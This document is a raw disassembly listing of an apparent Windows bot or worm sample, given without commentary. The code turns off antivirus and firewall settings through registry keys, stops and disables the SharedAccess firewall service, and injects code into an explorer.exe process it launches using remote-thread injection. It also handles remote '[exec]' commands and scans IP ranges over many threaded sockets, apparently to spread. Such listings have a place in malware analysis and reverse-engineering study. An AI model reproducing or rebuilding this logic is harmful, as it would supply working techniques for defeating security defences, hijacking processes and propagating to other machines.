loc_4033B0: ; CODE XREF: sub_403062+73�j
call sub_4048F9
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403062+134�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_4033D4
push [ebp+arg_4]
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_4043B4
loc_4033D4: ; CODE XREF: sub_403062+362�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033D9: ; CODE XREF: sub_403062+AC�j
call sub_4044C0
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033E3: ; CODE XREF: sub_403062+11A�j
push 10h
push dword_4014D4
call dword_401164 ; inet_ntoa
push eax
lea eax, [ebp+var_41C]
push eax
call dword_4010BC ; lstrcpynA
push dword_4014D8
call dword_401164 ; inet_ntoa
push eax
lea eax, [ebp+var_41C]
push eax
push offset aNi_16s_16s ; "[ni] %.16s %.16s"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 10h
push offset dword_401298
loc_40342B: ; DATA XREF: __u_____:0041628F�r
; __u_____:00416298�r ...
call sub_402C53
loc_403430: ; DATA XREF: __u_____:004164C7�r
; sub_416B96+73�w ...
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403435: ; CODE XREF: sub_403062+66�j
; DATA XREF: sub_414D29+3F�r
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
loc_40343C: ; DATA XREF: __u_____:00414C66�r
; __u_____:loc_41613C�r ...
cmp eax, 20h
jnz short loc_403480
push offset dword_4015F0
push offset aD ; "D"
push 0
push 0
push 28h
push 0
push 0
push 0
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
push 0
call dword_4010A8 ; CreateProcessA
cmp eax, 1
jnz short loc_403476
push offset aExec_0 ; "[exec] :)"
call sub_402C53
jmp short loc_403480
; ---------------------------------------------------------------------------
loc_403476: ; CODE XREF: sub_403062+406�j
push offset aExec ; "[exec] :("
call sub_402C53
loc_403480: ; CODE XREF: sub_403062+59�j
; sub_403062+3DD�j ...
call sub_403A18
jmp short locret_4034B7
; ---------------------------------------------------------------------------
loc_403487: ; CODE XREF: sub_403062+FB�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40349E
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_40414F
loc_40349E: ; CODE XREF: sub_403062+42F�j
jmp short locret_4034B7
; ---------------------------------------------------------------------------
loc_4034A0: ; CODE XREF: sub_403062+127�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short locret_4034B7
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_403F1F
locret_4034B7: ; CODE XREF: sub_403062+79�j
; sub_403062+B2�j ...
leave
retn 8
sub_403062 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034BB proc near ; CODE XREF: sub_4028D3+FD�p
; sub_402C9E+182�p
push ebp
mov ebp, esp
call dword_4010A4 ; GetTickCount
push eax
push offset dword_40170C
push offset a_8s08x ; "%.8s%08x"
push offset dword_401498
call dword_401104 ; wsprintfA
add esp, 10h
pop ebp
retn
sub_4034BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034DF proc near ; CODE XREF: sub_4025F4:loc_402625�p
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_122 = word ptr -122h
var_120 = word ptr -120h
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
mov [ebp+var_8], offset aN ; "n"
mov [ebp+var_148], 1
and [ebp+var_128], 0
mov [ebp+var_124], 2
mov [ebp+var_123], 0
mov [ebp+var_122], 8
and [ebp+var_120], 0
and [ebp+var_11E], 0
push 0
lea eax, [ebp+var_124]
push eax
push 0
push 0
push 4
push 6
call dword_401044 ; GetCurrentProcess
push eax
call dword_401034 ; SetSecurityInfo
lea eax, [ebp+var_C]
loc_403548: ; DATA XREF: sub_414D29+EA�w
; sub_41518C+3�r ...
push eax
push offset aSoftwareMicros ; "software\\microsoft\\ole"
push 80000002h
call dword_401030 ; RegCreateKeyA
push 2
push [ebp+var_8]
push 1
loc_403560: ; DATA XREF: sub_4169A0+9E�r
push 0
push offset aEnabledcom ; "enabledcom"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
loc_403570: ; DATA XREF: sub_414D29:loc_414F12�r
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
loc_40357C: ; DATA XREF: sub_4169A0+7�r
push eax
push offset aSystemCurrentc ; "system\\currentcontrolset\\control\\lsa"
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
loc_40359A: ; DATA XREF: __u_____:00415055�o
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aRestrictanon_0 ; "restrictanonymoussam"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSystemCurren_0 ; "system\\currentcontrolset\\services\\lanma"...
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aAutoshareserve ; "autoshareserver"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aAutosharewks ; "autosharewks"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwareMicr_0 ; "software\\microsoft\\security center"
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
loc_403640: ; DATA XREF: __u_____:004159E2�r
push offset aAntivirusdisab ; "antivirusdisablenotify"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aAntivirusoverr ; "antivirusoverride"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aFirewalldisabl ; "firewalldisablenotify"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aFirewalldisa_0 ; "firewalldisableoverride"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwarePolici ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwarePoli_0 ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
push 104h
lea eax, [ebp+var_118]
push eax
call dword_401070 ; GetWindowsDirectoryA
lea eax, [ebp+var_118]
push eax
push offset aSDebugDcpromo_ ; "%s\\debug\\dcpromo.log"
lea eax, [ebp+var_118]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
push 1
lea eax, [ebp+var_118]
push eax
call dword_40109C ; _lcreat
push eax
call dword_4010A0 ; _lclose
push 1
lea eax, [ebp+var_118]
push eax
call dword_4010C4 ; SetFileAttributesA
push 22h
push 0
push 0
call dword_401008 ; OpenSCManagerA
mov [ebp+var_4], eax
push 22h
push offset aSharedaccess ; "sharedaccess"
push [ebp+var_4]
call dword_401004 ; OpenServiceA
mov [ebp+var_11C], eax
lea eax, [ebp+var_144]
push eax
push 1
push [ebp+var_11C]
call dword_401020 ; ControlService
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push [ebp+var_11C]
call dword_40101C ; ChangeServiceConfigA
push [ebp+var_11C]
call dword_40100C ; CloseServiceHandle
push [ebp+var_4]
call dword_40100C ; CloseServiceHandle
leave
retn
sub_4034DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037DC proc near ; CODE XREF: sub_402650+7F�p
; sub_4027AF+48�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
call dword_401044 ; GetCurrentProcess
mov [ebp+var_8], eax
mov eax, dword_401060
mov dword_401651, eax
mov eax, dword_40105C
mov dword_40165D, eax
mov eax, dword_401058
mov dword_401664, eax
mov eax, dword_4010D4
mov dword_40166D, eax
push offset dword_4015F0
push offset aD ; "D"
push 0
push 0
push 44h
push 0
push 0
push 0
push offset aExplorer_exe ; "explorer.exe"
push 0
call dword_4010A8 ; CreateProcessA
push 2
push 0
push 0
lea eax, [ebp+var_C]
push eax
push dword_4015F0
push [ebp+var_8]
push [ebp+var_8]
call dword_401054 ; DuplicateHandle
mov eax, [ebp+var_C]
mov dword_40164C, eax
mov eax, [ebp+var_C]
mov dword_401658, eax
push 4
push 1000h
push 138h
push 0
push dword_4015F0
call dword_401050 ; VirtualAllocEx
mov [ebp+var_4], eax
push 0
push 34h
push offset dword_401644
push [ebp+var_4]
push dword_4015F0
call dword_40104C ; WriteProcessMemory
push 0
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov eax, [ebp+var_4]
add eax, 34h
push eax
push dword_4015F0
call dword_40104C ; WriteProcessMemory
push 0
push 0
push 0
push [ebp+var_4]
push 0
push 0
push dword_4015F0
call dword_401048 ; CreateRemoteThread
push 0
call dword_4010D4 ; ExitProcess
leave
retn
sub_4037DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038D9 proc near ; CODE XREF: sub_4027FE+2A�p
; sub_40414F+1D0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4038EA
; ---------------------------------------------------------------------------
loc_4038E3: ; CODE XREF: sub_4038D9+22�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4038EA: ; CODE XREF: sub_4038D9+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short locret_4038FD
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov byte ptr [eax], 0
jmp short loc_4038E3
; ---------------------------------------------------------------------------
locret_4038FD: ; CODE XREF: sub_4038D9+17�j
leave
retn 8
sub_4038D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403901 proc near ; CODE XREF: sub_4059EF+64�p
; sub_405AE6+42�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_403912
; ---------------------------------------------------------------------------
loc_40390B: ; CODE XREF: sub_403901+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403912: ; CODE XREF: sub_403901+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short locret_403927
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax], cl
jmp short loc_40390B
; ---------------------------------------------------------------------------
locret_403927: ; CODE XREF: sub_403901+17�j
leave
retn 0Ch
sub_403901 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40392B proc near ; CODE XREF: sub_4028D3+2E1�p
; sub_403F1F+72�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40393C
; ---------------------------------------------------------------------------
loc_403935: ; CODE XREF: sub_40392B+29�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40393C: ; CODE XREF: sub_40392B+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jnb short locret_403956
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
loc_403952: ; DATA XREF: sub_4169A0+16�w
; sub_416EDC+53�r
mov [eax], cl
jmp short loc_403935
; ---------------------------------------------------------------------------
locret_403956: ; CODE XREF: sub_40392B+17�j
; DATA XREF: sub_4169A0+4B�w ...
leave
retn 0Ch
sub_40392B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40395A proc near ; CODE XREF: sub_4028D3+290�p
; sub_402C9E+1D�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
loc_40395D: ; CODE XREF: sub_40395A+29�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_403985
mov eax, [ebp+arg_0]
loc_40396A: ; DATA XREF: sub_4169A0+88�w
; sub_416AB7+36�r
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_40397C
mov eax, [ebp+arg_0]
jmp short loc_403987
; ---------------------------------------------------------------------------
word_40397A dw 7EBh ; DATA XREF: sub_416A72+22�w
; sub_416B96+2D1�r
; ---------------------------------------------------------------------------
loc_40397C: ; CODE XREF: sub_40395A+19�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40395D
; ---------------------------------------------------------------------------
loc_403985: ; CODE XREF: sub_40395A+B�j
xor eax, eax
loc_403987: ; CODE XREF: sub_40395A+1E�j
pop ebp
retn 8
sub_40395A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40398B proc near ; CODE XREF: MEW:00404B90�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
loc_40398E: ; DATA XREF: sub_415EEB+20�w
; sub_415F5A+6�w ...
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
loc_40399A: ; DATA XREF: __u_____:0041617C�w
; __u_____:004166BD�r
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4039AC
mov eax, [ebp+var_4]
loc_4039AA: ; DATA XREF: sub_415EA4+8�w
; sub_415EA4+36�w ...
jmp short locret_403A14
; ---------------------------------------------------------------------------
loc_4039AC: ; CODE XREF: sub_40398B+1A�j
jmp short loc_4039B5
; ---------------------------------------------------------------------------
loc_4039AE: ; CODE XREF: sub_40398B+44�j
; sub_40398B+85�j
; DATA XREF: ...
mov eax, [ebp+var_4]
inc eax
loc_4039B2: ; DATA XREF: sub_414D29+4B�r
mov [ebp+var_4], eax
loc_4039B5: ; CODE XREF: sub_40398B:loc_4039AC�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_403A12
mov eax, [ebp+var_4]
loc_4039C2: ; DATA XREF: __u_____:004167B2�w
; sub_416923-3B�r
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_4039D1
jmp short loc_4039AE
; ---------------------------------------------------------------------------
loc_4039D1: ; CODE XREF: sub_40398B+42�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_4039D7: ; CODE XREF: sub_40398B:loc_403A08�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4039E8
mov eax, [ebp+var_4]
jmp short locret_403A14
; ---------------------------------------------------------------------------
dw 20EBh
; ---------------------------------------------------------------------------
loc_4039E8: ; CODE XREF: sub_40398B+54�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
mov edx, [ebp+var_C]
inc edx
mov [ebp+var_C], edx
mov edx, [ebp+var_8]
inc edx
mov [ebp+var_8], edx
cmp ecx, eax
jz short loc_403A08
jmp short loc_403A0A
; ---------------------------------------------------------------------------
loc_403A08: ; CODE XREF: sub_40398B+79�j
jmp short loc_4039D7
; ---------------------------------------------------------------------------
loc_403A0A: ; CODE XREF: sub_40398B+7B�j
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
jmp short loc_4039AE
; ---------------------------------------------------------------------------
loc_403A12: ; CODE XREF: sub_40398B+32�j
xor eax, eax
locret_403A14: ; CODE XREF: sub_40398B:loc_4039AA�j
; sub_40398B+59�j
leave
retn 8
sub_40398B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A18 proc near ; CODE XREF: sub_4028D3+9�p
; sub_403062:loc_403480�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
push offset aDnsapi_dll ; "dnsapi.dll"
call dword_401068 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short locret_403A4F
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push [ebp+var_4]
call dword_401064 ; GetProcAddress
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short locret_403A4F
call [ebp+var_8]
locret_403A4F: ; CODE XREF: sub_403A18+1B�j
; sub_403A18+32�j
leave
retn
sub_403A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A51 proc near ; CODE XREF: sub_402C9E:loc_402FBA�p
; sub_403062+328�p
push ebp
mov ebp, esp
cmp dword_401680, 1
jnz short loc_403A94
and dword_401680, 0
push 0
push 0
push 0BD01h
push offset loc_403AA5
push 0
push 0
call dword_4010B4 ; CreateThread
push 0
push 0
push 1BD01h
push offset loc_403AA5
push 0
push 0
call dword_4010B4 ; CreateThread
loc_403A94: ; CODE XREF: sub_403A51+A�j
pop ebp
retn
sub_403A51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A96 proc near ; CODE XREF: sub_403062+33A�p
push ebp
mov ebp, esp
mov dword_401680, 1
pop ebp
retn
sub_403A96 endp
; ---------------------------------------------------------------------------
loc_403AA5: ; DATA XREF: sub_403A51+1C�o
; sub_403A51+34�o
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_4010A4 ; GetTickCount
mov esi, eax
call dword_40106C ; GetCurrentThreadId
xor esi, eax
mov [ebp-1Ch], esi
cmp dword_4014D8, 0FFFFFFFFh
jnz short loc_403AD3
mov eax, [ebp-1Ch]
shl eax, 10h
mov [ebp-14h], eax
jmp short loc_403AEC
; ---------------------------------------------------------------------------
loc_403AD3: ; CODE XREF: MEW:00403AC6�j
movzx eax, byte ptr dword_4014D8
shl eax, 18h
movzx ecx, byte ptr dword_4014D8+1
shl ecx, 10h
or eax, ecx
mov [ebp-14h], eax
loc_403AEC: ; CODE XREF: MEW:00403AD1�j
mov eax, [ebp+8]
shr eax, 10h
jnz short loc_403B04
mov dword ptr [ebp-18h], 0FFFF0000h
mov dword ptr [ebp-4], 0FF00h
jmp short loc_403B12
; ---------------------------------------------------------------------------
loc_403B04: ; CODE XREF: MEW:00403AF2�j
mov dword ptr [ebp-18h], 0FF000000h
mov dword ptr [ebp-4], 0FFFF00h
loc_403B12: ; CODE XREF: MEW:00403B02�j
mov eax, [ebp+8]
and eax, 0FFFFh
mov [ebp-8], ax
loc_403B1E: ; CODE XREF: MEW:00403B8C�j
cmp dword_401680, 0
jnz short loc_403B8E
mov eax, [ebp-14h]
and eax, [ebp-18h]
mov ecx, [ebp-1Ch]
and ecx, [ebp-4]
or eax, ecx
mov [ebp-10h], eax
push 400h
call dword_4010DC ; Sleep
mov eax, [ebp-10h]
mov [ebp-0Ch], eax
jmp short loc_403B54
; ---------------------------------------------------------------------------
loc_403B4B: ; CODE XREF: MEW:00403B77�j
mov eax, [ebp-0Ch]
add eax, 20h
mov [ebp-0Ch], eax
loc_403B54: ; CODE XREF: MEW:00403B49�j
mov eax, [ebp-10h]
add eax, 100h
cmp [ebp-0Ch], eax
jnb short loc_403B79
push dword ptr [ebp-8]
push dword ptr [ebp-0Ch]
call sub_403B95
push 200h
call dword_4010DC ; Sleep
jmp short loc_403B4B
; ---------------------------------------------------------------------------
loc_403B79: ; CODE XREF: MEW:00403B5F�j
call dword_4010A4 ; GetTickCount
mov esi, eax
call dword_40106C ; GetCurrentThreadId
xor esi, eax
mov [ebp-1Ch], esi
jmp short loc_403B1E
; ---------------------------------------------------------------------------
loc_403B8E: ; CODE XREF: MEW:00403B25�j
xor eax, eax
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B95 proc near ; CODE XREF: MEW:00403B67�p
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = word ptr -2B8h
var_2B6 = word ptr -2B6h
var_2B4 = dword ptr -2B4h
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
var_88 = dword ptr -88h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2C4h
mov [ebp+var_2BC], 1
and [ebp+var_2A0], 0
and [ebp+var_190], 0
mov [ebp+var_2B8], 2
mov ax, [ebp+arg_4]
mov [ebp+var_2B6], ax
and [ebp+var_2A8], 0
and [ebp+var_2A4], 0
and [ebp+var_4], 0
jmp short loc_403BE5
; ---------------------------------------------------------------------------
loc_403BDE: ; CODE XREF: sub_403B95+194�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403BE5: ; CODE XREF: sub_403B95+47�j
cmp [ebp+var_4], 20h
jge loc_403D2E
push 6
push 1
push 2
call dword_401160 ; socket
mov ecx, [ebp+var_4]
mov [ebp+ecx*4+var_88], eax
lea eax, [ebp+var_2BC]
push eax
push 8004667Eh
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_401154 ; ioctlsocket
loc_403C21: ; CODE XREF: sub_403B95+10A�j
and [ebp+var_2C0], 0
jmp short loc_403C37
; ---------------------------------------------------------------------------
loc_403C2A: ; CODE XREF: sub_403B95:loc_403C60�j
mov eax, [ebp+var_2C0]
inc eax
mov [ebp+var_2C0], eax
loc_403C37: ; CODE XREF: sub_403B95+93�j
mov eax, [ebp+var_2C0]
cmp eax, [ebp+var_2A0]
jnb short loc_403C62
mov eax, [ebp+var_2C0]
mov ecx, [ebp+var_4]
mov eax, [ebp+eax*4+var_29C]
cmp eax, [ebp+ecx*4+var_88]
jnz short loc_403C60
jmp short loc_403C62
; ---------------------------------------------------------------------------
loc_403C60: ; CODE XREF: sub_403B95+C7�j
jmp short loc_403C2A
; ---------------------------------------------------------------------------
loc_403C62: ; CODE XREF: sub_403B95+AE�j
; sub_403B95+C9�j
mov eax, [ebp+var_2C0]
cmp eax, [ebp+var_2A0]
jnz short loc_403C9D
cmp [ebp+var_2A0], 40h
jnb short loc_403C9D
mov eax, [ebp+var_2C0]
mov ecx, [ebp+var_4]
mov ecx, [ebp+ecx*4+var_88]
mov [ebp+eax*4+var_29C], ecx
mov eax, [ebp+var_2A0]
inc eax
mov [ebp+var_2A0], eax
loc_403C9D: ; CODE XREF: sub_403B95+D9�j
; sub_403B95+E2�j
xor eax, eax
jnz short loc_403C21
loc_403CA1: ; CODE XREF: sub_403B95+18A�j
and [ebp+var_2C4], 0
jmp short loc_403CB7
; ---------------------------------------------------------------------------
loc_403CAA: ; CODE XREF: sub_403B95:loc_403CE0�j
mov eax, [ebp+var_2C4]
inc eax
mov [ebp+var_2C4], eax
loc_403CB7: ; CODE XREF: sub_403B95+113�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_190]
jnb short loc_403CE2
mov eax, [ebp+var_2C4]
mov ecx, [ebp+var_4]
mov eax, [ebp+eax*4+var_18C]
cmp eax, [ebp+ecx*4+var_88]
jnz short loc_403CE0
jmp short loc_403CE2
; ---------------------------------------------------------------------------
loc_403CE0: ; CODE XREF: sub_403B95+147�j
jmp short loc_403CAA
; ---------------------------------------------------------------------------
loc_403CE2: ; CODE XREF: sub_403B95+12E�j
; sub_403B95+149�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_190]
jnz short loc_403D1D
cmp [ebp+var_190], 40h
jnb short loc_403D1D
mov eax, [ebp+var_2C4]
mov ecx, [ebp+var_4]
mov ecx, [ebp+ecx*4+var_88]
mov [ebp+eax*4+var_18C], ecx
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
loc_403D1D: ; CODE XREF: sub_403B95+159�j
; sub_403B95+162�j
xor eax, eax
jnz short loc_403CA1
push 10h
call dword_4010DC ; Sleep
jmp loc_403BDE
; ---------------------------------------------------------------------------
loc_403D2E: ; CODE XREF: sub_403B95+54�j
and [ebp+var_4], 0
jmp short loc_403D3B
; ---------------------------------------------------------------------------
loc_403D34: ; CODE XREF: sub_403B95+1D8�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403D3B: ; CODE XREF: sub_403B95+19D�j
cmp [ebp+var_4], 20h
jge short loc_403D6F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call dword_401158 ; ntohl
mov [ebp+var_2B4], eax
push 10h
lea eax, [ebp+var_2B8]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_40112C ; connect
jmp short loc_403D34
; ---------------------------------------------------------------------------
loc_403D6F: ; CODE XREF: sub_403B95+1AA�j
push 1400h
call dword_4010DC ; Sleep
lea eax, [ebp+var_2A8]
push eax
push 0
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_2A0]
push eax
push 0
call dword_401138 ; select
mov [ebp+var_194], eax
and [ebp+var_4], 0
jmp short loc_403DAC
; ---------------------------------------------------------------------------
loc_403DA5: ; CODE XREF: sub_403B95:loc_403E0A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403DAC: ; CODE XREF: sub_403B95+20E�j
cmp [ebp+var_4], 20h
jge short loc_403E0C
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_401140 ; closesocket
cmp [ebp+var_194], 0FFFFFFFFh
jz short loc_403DFF
lea eax, [ebp+var_2A0]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call sub_405C4E ; __WSAFDIsSet
test eax, eax
jnz short loc_403E0A
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call sub_405C4E ; __WSAFDIsSet
test eax, eax
jnz short loc_403E0A
loc_403DFF: ; CODE XREF: sub_403B95+234�j
mov eax, [ebp+var_4]
or [ebp+eax*4+var_88], 0FFFFFFFFh
loc_403E0A: ; CODE XREF: sub_403B95+24E�j
; sub_403B95+268�j
jmp short loc_403DA5
; ---------------------------------------------------------------------------
loc_403E0C: ; CODE XREF: sub_403B95+21B�j
and [ebp+var_4], 0
jmp short loc_403E19
; ---------------------------------------------------------------------------
loc_403E12: ; CODE XREF: sub_403B95:loc_403E55�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403E19: ; CODE XREF: sub_403B95+27B�j
cmp [ebp+var_4], 20h
jge short locret_403E57
mov eax, [ebp+var_4]
cmp [ebp+eax*4+var_88], 0FFFFFFFFh
jz short loc_403E55
push 0
push 0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call dword_401158 ; ntohl
push eax
push offset loc_40581A
push 0
push 0
call dword_4010B4 ; CreateThread
push 8
call dword_4010DC ; Sleep
loc_403E55: ; CODE XREF: sub_403B95+295�j
jmp short loc_403E12
; ---------------------------------------------------------------------------
locret_403E57: ; CODE XREF: sub_403B95+288�j
leave
retn 8
sub_403B95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E5B proc near ; CODE XREF: sub_402C9E+E3�p
; sub_403E5B+39�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov eax, [ebp+arg_0]
mov al, [eax]
mov [ebp+var_4], al
cmp [ebp+var_4], 0
jz short loc_403E7C
cmp [ebp+var_4], 2Ah
jz short loc_403E8C
cmp [ebp+var_4], 3Fh
jz short loc_403EC4
jmp short loc_403EE5
; ---------------------------------------------------------------------------
loc_403E7C: ; CODE XREF: sub_403E5B+11�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
neg eax
sbb eax, eax
inc eax
jmp loc_403F1A
; ---------------------------------------------------------------------------
loc_403E8C: ; CODE XREF: sub_403E5B+17�j
push [ebp+arg_4]
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_403E5B
cmp eax, 1
jnz short loc_403EA5
xor eax, eax
inc eax
jmp short loc_403F1A
